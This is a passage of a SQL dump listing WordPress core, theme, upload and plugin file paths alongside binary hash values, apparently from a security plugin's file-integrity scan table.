�\r���;Q(\'�\"�b','',0,'?'),('���ڧ9����4~�7z','wp-content/plugins/wordpress-seo/src/deprecated/frontend/frontend.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*X�ڌ�?��x�x\0','�2X�~nt*���{ɸ\r�%��w�����IɅ�e�','',0,'?'),('��s�ՌQ��7o���','wp-content/plugins/wordfence/views/common/status-detail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`Ufxy9�9��g4��','���E�F�j&\n��E��&J՟gWk.���T/','',0,'?'),('���~?&���_r\\s�h','wp-content/uploads/2019/10/plumbing.jpg',0,'&�&��ؕ�Vf�?9','&�&��ؕ�Vf�?9','�\"�[�\"���K:�?]��J�D�$m�','',0,'?'),('�«��-j=�u�N\\q\'','wp-admin/css/farbtastic.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��8)���}{��C�h2U','|A��L��Mb�x�d8X�jX.���^\n\Z�','',0,'?'),('�ҰJ��?\n���$z�','wp-content/plugins/wordpress-seo/src/helpers/taxonomy-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��&�\r�7�g)��','%���L����Q��Yޖ/����n;r�7��','',0,'?'),('�ԏ��R��!�&!','wp-content/plugins/wordpress-seo/src/schema-templates/recipe-instructions.schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$0��2���F��E+','5����|��m�EV��Z���ݘf�cMLJt��','',0,'?'),('��u�gk�D��E��K','wp-includes/blocks/query-pagination-numbers/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','miƈ�nѪą@@b\\','8���&�����]Y���Y��✀fu�oM�@T��','',0,'?'),('��ᗏ�3�-��4�','wp-admin/css/colors/midnight/colors-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D���t�Pc���c<Dm','���{j͑1�t��ͻ_|?F��� �Ռ�y�ډ','',0,'?'),('�\"ڕK[@�G����9�','wp-admin/includes/class-wp-theme-install-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<d�|~\Z���$��K','��5���F(*��\0�6t�<ಌ2 �A�3���','',0,'?'),('�#��u0�c���}���','wp-includes/js/dist/i18n.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�CQ���9A4n�\nCa','\Z�.H~2\Z��P����{���&���c��H\0�','',0,'?'),('�$�Q�sP���R3}/','wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@��9o;&�t���','C۞�`�)�t����f��K|j�����d�~','',0,'?'),('�3!9�=�6�ݡ','wp-admin/images/resize-rtl-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M���M�H�!�YA','�2��m�o��{�|�ny��˃�4(�φ�=�','',0,'?'),('�Ioo�Ԇ5nu�ѭ��H','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�6F�\0f����','N��^q��yqܯ\r]�S��\\��[�C{V��y�w�','',0,'?'),('�Zg�Ui1i�ƾ�x�=�','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�d�W�,��XEE�o�','l?���)&&������P��P$@�\\�/�','',0,'?'),('�^2^�T��:�mJ��:�','wp-content/plugins/wordfence/lib/IPTrafList.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܢj��lhŬ�\n�','�|�E����*5C�T)QB�Rߦ�:�+\Z�2;','',0,'?'),('�b�0݀>j�\"��G','wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Aa+JD$�2��J��','�/#?T�iOLyv��u��TK���ɤ��\\ػ�','',0,'?'),('�v�st�h�ڲ�C��N�','wp-content/plugins/wordpress-seo/src/presenters/googlebot-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ZKx�$Gi7�5q','�Y�`�mԿ�,ik�\\��ݜt*xE��ٙ;tM','',0,'?'),('��r���.D��[��(\\�','wp-content/uploads/2019/08/IS-AN-ELECTRICAL-CERTIFICATE-NECESSARY-WHEN-SELLING-YOUR-HOME-350x220.jpg',0,'k��/���l��t��d�','k��/���l��t��d�','�̷3��~��D�t{b�G�Ks��\0�[�','',0,'?'),('���n�Ioc�!���','wp-content/plugins/wp-cerber/assets/magnific/jquery.magnific-popup.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�$Ȼ�����0bn','mS$^�|T�8�đ����=�ظ�l��F��`p�','',0,'?'),('���o<��e����','wp-content/plugins/redirection/locale/redirection-zh_TW.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�۷�\n�М��','%A��I[��TQ�Ʀ���K������}*w��,','',0,'?'),('��������u��j`T','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/LazyOpenStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� 0�3���$��z�h','��p����뻳xi�p�x����s{��`�','',0,'?'),('����H{��.Q73l�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/es.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f��e/��i�)�p{C�','1L���eȧPj��\\@\"�tg_��ْ��','',0,'?'),('��&V7s������c�','wp-content/plugins/wordpress-seo/admin/views/tabs/metas/archives/help.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1��yX�3��S���\"�','���y�~E.�m����vmt␘�Ӫ�L&�','',0,'?'),('��O��4����%m�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��?1� ���4��M�','e��2M�B���\n\0��7�0�Zz�F%�s','',0,'?'),('��sC<�:���<�A�','wp-includes/sodium_compat/src/Core/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���:�Z{���5�o','���<�s�6��\0, Ra�uhX��c���','',0,'?'),('�����@�j=�','wp-content/plugins/wp-cerber/assets/sh/scripts/shBrushPhp.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\nR�1G˕�\n���hc�','����� ��^b��V���l!�,�G�3/','',0,'?'),('�)[\"J�H��|�jk��$','wp-admin/js/customize-widgets.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����0؛�;q��','���[\'0y����W��x���p�*-t-I�d�','',0,'?'),('�?Fϸ����A��R1�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��ԏ�d0��lN&7+','^s\n�@G,�ږ\n;|3P nԔ/\rzA�\"\nd','',0,'?'),('�JTV0D��oTA[@�','wp-admin/options-discussion.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2��~�vg��3ܘ�','�lAt;��#�Tt�_�y\\S=���#:X٥j�','',0,'?'),('�^�2˵��G�\\`2>�','wp-content/uploads/2016/11/interior-design-2047075_960_720-350x220.jpg',0,'��t��D�k)2�:','��t��D�k)2�:','� ���iS&\"�d0��8`��\\ʒ\"��ʁa','',0,'?'),('��\\����\r� ��:#�K','wp-content/plugins/wp-cerber/assets/flags/bo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0-�a�vv��','=�IS}�@l��U�%s�=�FG41R�\'�','',0,'?'),('����S�8M�C��>��','wp-includes/js/dist/block-serialization-default-parser.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:�� ����',')24�Na�K�-���d��E��ʂ ��','',0,'?'),('�����dD����+P�','wp-content/themes/twentytwenty/template-parts/modal-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s!��w���uţ\\','x�2�ա�_\0�?�q�q�u)�T|�/\\�(','',0,'?'),('��8\Z�1\nȉ=\n��{�','wp-content/plugins/wordpress-seo/src/helpers/open-graph/values-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��?�&�|�\Zt��','��![��D�҉��ܞ�Y�]O�#*�`V','',0,'?'),('����S�h���S�%Tz�','wp-includes/js/mediaelement/wp-mediaelement.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%/NqOR�g��+\\�','F}\Z\n��v�n�`��Z�!�T��W����s','',0,'?'),('���\Z�g����D�L�','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-message/src/UriInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�kPӊ��_4��','��1�b��ߟ��v�,�#G��l$fc�����','',0,'?'),('��������3���k�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-dashboard-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���-����X>`b','�s��a�Ӌ�\0$T���bc8��dŅ���?>','',0,'?'),('����}��m�ט�G','wp-content/plugins/wordpress-seo/js/dist/editor-modules-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b��2��a A���H��','^��W�z���h�����m�jb���hY`�D��;','',0,'?'),('��VϺz#���m)��','wp-content/themes/twentytwenty/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Χn��*�B\"�z���0B','��_\\�]-�V|���ʓO>;��O�$�Pw�2�','',0,'?'),('��.������I�\\�','wp-content/plugins/wp-cerber/assets/flags/jo.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�z>\Z�➶6�A3+Lh�','��\'\"5��zF��aLK�3pr��*�=�.>aq\"','',0,'?'),('���\"ܒ����nzD','wp-includes/SimplePie/Caption.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܊��y�u�D\r£�','\'�W1Q�5[ۋ�)��\r�85:��?*)K','',0,'?'),('���Wd�;C\r���O�','wp-content/plugins/akismet/views/notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'~m���L��8�','�ށD��X�Q��gW5�G�A�6G3�Z�U�x','',0,'?'),('��ˋ�_o!\'�u��r','wp-content/plugins/wordfence/views/common/page-tabbar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q���VdЌX@q�ș��','S���تA���Ӥ�@5����|�~�?KBK9U','',0,'?'),('���,w�k�27ؾg','wp-content/plugins/wordpress-seo/languages/wordpress-seojs.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���j{��D�����','�,?�3����p�<ѻK��ͣ(��\n��|B�','',0,'?'),('��Z\nu�oK� ��T;e','wp-admin/images/list.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>��*�ӳ�S��','\\w��T[�=�b�aCk������;c���','',0,'?'),('��ll���x�L,7W�N�','wp-content/plugins/wordfence/views/common/modal-prompt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0J�.H[|�E3$d�','�\Z�z%����;�����o��n��m&������','',0,'?'),('�����2��ʄ��BaG','wp-content/plugins/wordpress-seo/languages/yoast-components-ro_RO.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̆�X�b�<�zc�+','��e=�����;�-�0D����Ix9j�>��','',0,'?'),('��@�~���a�UKIF','wp-content/uploads/2019/08/business-training-updraft-pre-smush-original.jpg',0,'%Eu��1���&N��h�','%Eu��1���&N��h�','���l�ņ�Ό��h�t?\\���SY�Y�wy-','',0,'?'),('�4)tk�l#�<��U�','wp-includes/block-patterns/query-grid-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\����J�B�<��','�sA�>�{�k�/PxYp*���L膺ϲ��','',0,'?'),('���Uy/�*%��;','wp-admin/includes/update-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N�&�$^�����r��7','��;�V]M+ǐO����V%F�G-���p���\Z','',0,'?'),('�\rE��U���̈́��','wp-includes/images/wpspin-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','mS������y\"C���','��66S�X������6O}�4>�p�\"���\'1','',0,'?'),('�W���P旃^q�y�','wp-content/plugins/wordfence/lib/menu_firewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���5X��P���K���','�S���P���A�_�l�W��2��?#_\rQ�x�','',0,'?'),('�I=bh�ʔGIkoba','wp-content/plugins/all-in-one-wp-security-and-firewall/wp-security-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���瓢��)�','���k�j桕\';�Ԧ��(��u�I�sǕ�w','',0,'?'),('�NR,�J�*�̦G$i�','wp-content/plugins/wordpress-seo/admin/class-option-tabs-formatter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���K�u����j','�&�5+�Ý%gD�Q�_]��\Z��dO���EGp','',0,'?'),('�Q9��0N�b[��%���','wp-content/languages/en_GB-49c6d4acf36cf3aca9f0b2a77617304f.json',0,'���!>{t��\\���','���!>{t��\\���','���\0Ł��}���)�dVT �?�j;�','',0,'?'),('�h/͔��j�C�\0�n','wp-admin/includes/class-plugin-upgrader-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�pT�0$�����.�','?�t�D~#͘��/X�#G/���Nf\\��͜gN','',0,'?'),('�x�W���2e�uv�L','wp-includes/customize/class-wp-customize-background-image-control.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{f�&��E\\$�sX�','R�v3����~������|.O�L�t�N`Ѯ��','',0,'?'),('�6���?�^o�#�','wp-includes/sodium_compat/namespaced/Core/SipHash.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r-�e��r^�!�~','��`��R�lԥLz�?i�āACH�Py�n','',0,'?'),('��Zߎ�Cq9��k���','wp-content/plugins/wordpress-seo/languages/yoast-components-fr_FR.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4������R)�','���:6.\0@��3�E�E��Kl=��Нvc<�!�','',0,'?'),('���R �(�, !)�Z','wp-content/plugins/wordfence/waf/pomo/mo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D��6��~.���S�[','��\\\'�_F�u�C)CR\"(C�O�YW�!��)','',0,'?'),('��K}{X��UG9<p�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?�>�ᠼU��/G�@','��oyJ(B��f2H\'�h�!�\'* ɹ*��','',0,'?'),('�������݈3�+P\r','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Country.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����,0��Z%���','�g^�M���9=&*�M{��Xb�0*�u���','',0,'?'),('�����&@p����ɗ','wp-includes/js/dist/wordcount.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','L6\'��{G�p(�\"(��s','�Q��@�GC�^#��^��o��PM,Eԅ^C\Z7','',0,'?'),('���ΦHc�^����)','wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������\'�{=ͺ','���R������_f�W{*3����ݔ �\"�/�','',0,'?'),('��h�SĿQ���R��','wp-content/plugins/wordpress-seo/admin/import/class-import-plugin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�$omocg�]N(��','�\n�}�fX�Ĝb<E�o�.[<v6�1_�^','',0,'?'),('������sp���e�','wp-admin/includes/class-wp-ms-sites-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�[II�[�I#i��','<�C~��-.�\0��9q�\\��}�)���~�[$','',0,'?'),('��(Bu�{��tZ܍','wp-content/plugins/redirection/locale/redirection-hr.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]\nwMY�gV�B��xQ','�aL;���!��>mM�R�H��T��,���3���','',0,'?'),('���@Pw�y���3�Ks','wp-includes/blocks/site-tagline/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˂1c�Z�>�R �EJm','��U)�}�$EMb0mCTA�0\\pN2�O^','',0,'?'),('�� �ӭgȱ!n�P�','wp-includes/IXR/class-IXR-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a���J�}��!�W��','Yw��1��v.�G3e�d��Ä��y`LR ]','',0,'?'),('���ʜ\\\"���z@*>�\Z','wp-includes/blocks/site-tagline.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2oH\"ϵ8����zw ','�����h���9�DP\"��ϑ�hf��f%�','',0,'?'),('�\nD���%a-�Iq��','wp-content/plugins/wp-cerber/assets/fonts/roboto/Roboto-Regular.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��-�\\p�R�kI�','hX�ʀF^1��it8�O��qS�)��.�','',0,'?'),('�\ni_�a*���>�dnP','wp-includes/blocks/post-excerpt/style-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�6�%�}�:&fM��','�+$E�kҭw�֍\rS:�|K>�_c�\0=I<q','',0,'?'),('��Y;�tivf��˪','wp-content/plugins/wordpress-seo/languages/yoast-components-it_IT.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+o�\'Oի���6��d�','M�:_m7�lD]��Ԟ��ۖ�\r�K��~�CO','',0,'?'),('�(������]dJ\rl','wp-content/plugins/wp-cerber/cerber-addons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ǜ�9Twu*�Ҳ�i','��v� %Kj���\\J��/��՝mRb��X','',0,'?'),('�-1�8�;�T�/X�]','wp-admin/ms-sites.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f3����&S��7F76�','���,�$�y�n)R��Hg���h{�$��U��','',0,'?'),('�7ʔ`�U�\'�ʥMOk','wp-content/uploads/2019/08/thai-property-350x220.jpg',0,'|�H-^���|u�UUeԅ','|�H-^���|u�UUeԅ','�pC۹��V���1���z�M��h�\\�+�y','',0,'?'),('�D��}U���#��:�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/Uri.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0b�$��+Í�','��MS|@���3.�M�R>Q�v7\rRy��','',0,'?'),('�I�Y v�1BI��\'�','wp-content/plugins/wordpress-seo/admin/class-yoast-plugin-conflict.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^��)�ML��B��','^Y�����8�s�j��m�j=�*���~�','',0,'?'),('�K���4�7\'�Rh?�','wp-content/themes/twentytwenty/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��2�VU�\0ZZ�)7�}','��w��r����n�~4���RR��h��','',0,'?'),('�h��*�]!�q�$ ','wp-content/uploads/2019/10/plumbing1-768x512.jpg',0,'�H�G![ғcE�x�5�','�H�G![ғcE�x�5�','�r�V�~r�*��d6=6A�s�y�χ*��n�ؠ','',0,'?'),('�j�<M�Dd����4m�','wp-admin/includes/ms-admin-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���;�Ƽz�g�L���','��t�Mp���Q�8=��~bw����/���','',0,'?'),('��C1���@E�m��','wp-content/uploads/2019/08/Green-Energy-300x250.jpg',0,'y��|�A���ħ\Z��i','y��|�A���ħ\Z��i','r-�^H�]Y�@� 7~ń��C�P�@�n�E�:','',0,'?'),('��Zɡ����l\'�}�','wp-content/languages/en_GB-440127dd25bde48a531ded36f33e927b.json',0,'2�C�/�9ݣ�n�N�d','2�C�/�9ݣ�n�N�d','6���W��Gt\'��0q�#����Ť ����8','',0,'?'),('�����f1n����','wp-content/plugins/wordpress-seo/css/dist/select2/select2-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P9r��l������','R�#��\0��>��qVwy$ys����ri��Ku','',0,'?'),('���=cei�ٍ+��','wp-content/plugins/wordpress-seo/src/config/migrations/20201216124002_ExpandIndexableIDColumnLengths.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�=���|�p<�~*i','�1 �ۍCԧ\\��ũ�sژߟT�{G�> �u�','',0,'?'),('�Ρ~�ߓ�:����eo','wp-content/plugins/wordfence/images/icons/tick128.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ğ��c�h4\"���','����V��}X e~G[C�峆��5������','',0,'?'),('�ώzkks���k-\0F','wp-content/plugins/wordpress-seo/admin/import/plugins/class-import-rankmath.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�`�!zp+Ā(-�s/�','�`,x����!�7�] ��\\�?Ȃ�V/&˙�','',0,'?'),('�����(觨:pR�/','wp-includes/class-walker-nav-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����>�d}Y�zcld','�Z\"P`��\'h�`��Lk���̼�G�~M�J�','',0,'?'),('��J�$R��_���o�','wp-content/plugins/wp-cerber/assets/flags/lk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m ���t�����','vl�a��tb�N���u�G�:���<?�7�=','',0,'?'),('�����0��[��\\6','wp-content/plugins/wordpress-seo/admin/ajax/class-yoast-dismissable-notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����V��Z�����','6,��k}��J�U��a<�d�8�4�?��̾(','',0,'?'),('��(5�aH�yo,X�','wp-includes/js/jquery/ui/tabs.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a`|��^(=`��hv','L�.X_ �DJ��tk��H��!|��ݔJ��x','',0,'?'),('����}��p�u�1\"�\n�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Cookie/SetCookie.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CV Sn?�a���$','�mb&J(=#m�\\�~\"v���Ó�y �6?o��*�','',0,'?'),('�/7�ñ�cx��p��g','wp-content/plugins/wordfence/views/onboarding/fresh-install.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q�jgG9�վ��lW[�','Y�Kq���@�CP���X!J�rG�\"��?','',0,'?'),('���ڥ�^i�$��&','wp-content/plugins/wordfence/lib/wfCredentialsController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z��\0����իw6�','7�6��ay��5�?}%.]����؞u���S�','',0,'?'),('�$�͓�bHn��,\0-','wp-includes/images/smilies/icon_confused.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/# �Ӣww$x꾓Y','U0�\\L�X��fXƦ�G\0�T���$a�5U�B�','',0,'?'),('�,�t��!O\0�PR���|','wp-content/plugins/redirection/images/GitHub-Mark-64px.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�\',_�Jm�M>KŽ','/\rTAY��م��ѻ���v�g�>�!Eh','',0,'?'),('�-��췓��9�ExZ','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/constants.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xw���Tg���A}�\n','�k�cQx�e�˳`=n6�X5y��dz5u]WB\'','',0,'?'),('�5��8���T5��-','wp-content/plugins/wordpress-seo/src/helpers/require-file-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�z�2M4����','����.�k�����=@[9�W��P+|���8�','',0,'?'),('�7K�!(�t�4��b�','wp-content/plugins/wordpress-seo/src/builders/indexable-author-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ʟ��j���ߞ�','�݀�V��C�,B��ę��z�֜_��`�@f�;','',0,'?'),('�C��z��\Z�C����/','wp-content/plugins/wordpress-seo/js/dist/externals/draftJs-1690.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')0�v��B�5)0�7O','d��h�=�ۢ��z �0��e�;1���','',0,'?'),('�N��ZND��N�>Y ','wp-includes/js/dist/components.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������M�r1Q<V','Ƹ@.�_�N���쇤M������\\r2��ۘ�','',0,'?'),('�e-�~<�}�Y$�M','wp-content/plugins/wordpress-seo/languages/wordpress-seojs-es_ES.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�~uC )��\r*�)a�','~��B/˂z���<���r��]k��k���','',0,'?'),('�{4�.������#�#','wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' B<�<��LU�:uUn','�ZІ��\\�@@�G��P��#=|�\'k4��','',0,'?'),('�ܰ����_~�h sc','wp-includes/blocks/spacer/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� @-ŏ��K$_ӯp�','�D�\Z�e�(�kr�����l0�u�[Iya/�/�H','',0,'?'),('��_ܼ���iJ�d�\"','wp-includes/blocks/heading/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����y��<�(�Ę�','�\rU���tJ�`�g04 n��՞F�LZ���','',0,'?'),('��뻛Ib�,6�Y+�8:','wp-content/themes/twentynineteen/sass/typography/_copy.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��n�L�ر^��#*��s','+�\\��`F���~���)?���9G�}B1��','',0,'?'),('��v\'j@�-��*','wp-includes/widgets/class-wp-widget-media-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7_^\\fS�ɉ�]6n#\Z','>�@ΡD���&���{�(���Dγ����i�O#','',0,'?'),('����Ӡx��@A��','wp-content/plugins/wordpress-seo/src/wordpress/wrapper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v�s���c����E�','q@<��\"*2�f�F���R��@��:zĺ%�O','',0,'?'),('����X���-��Of','wp-includes/blocks/nextpage/editor.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5���ډd��2,�','8 �:� D+�\"d����sW�\0\Z���̞�','',0,'?'),('�\n]Eg���7Oq�b��','wp-includes/sitemaps/class-wp-sitemaps-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����G���o�\n�>','>��\0�B��[��Z��>�p�ޏ�a0~5k�[�G�','',0,'?'),('����n��j�P�+��','wp-admin/includes/class-custom-image-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����[*1�%��q�','�HS�- �\'��3��6}ެ^���W�y|��','',0,'?'),('�\Z�������Bi/6�','wp-includes/js/jquery/ui/effect-clip.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']02[W�0V1�Q','�|�JR?�]ϭ̺\\T�v���� ��5t����$','',0,'?'),('�$�%\'a˭����','wp-content/plugins/wordpress-seo/src/repositories/indexable-hierarchy-repository.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n+��ʃ���o(1�','�B�O/�<���暵�R�z�N}�E<5��+1���','',0,'?'),('�8u7�h@jx�\"�5','wp-includes/class-wp-block-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fW�ެ�Q�G��<4','ԥ?�CZæ���\Z�+J4|����d�F߾o�','',0,'?'),('�L���yE�{��f�','wp-includes/css/dashicons.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֍k����U�о�3�','|�38�9&ΚG�\"#��\0̠��;���e�R�','',0,'?'),('�N����Փ_�T\n��','wp-content/plugins/wordpress-seo/inc/health-check-page-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<՞(!�F�RWB��)','��?`p�MB����IV�U���.�� �;ba�','',0,'?'),('�g�bf�\r\Z��ъ�','wp-includes/blocks/rss/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3:&[���=#�','AZag�����K\"�]&�\0�+���','',0,'?'),('�k�UL��ǡ�$���','wp-admin/ms-users.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','³u~]�*C�u�\0�','e�s}k�_��q}���~G���[�5�Q�u�!�','',0,'?'),('�o/N���t$�$���|','wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ��RXjJw�E��','��O�V�P�K��Lѐ��(Е�#uu.�','',0,'?'),('�rn�` m��$\0��V','wp-includes/blocks/media-text/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A:d�\r���G���K�','1s���cr�G�HR�V[�s_�r��>� 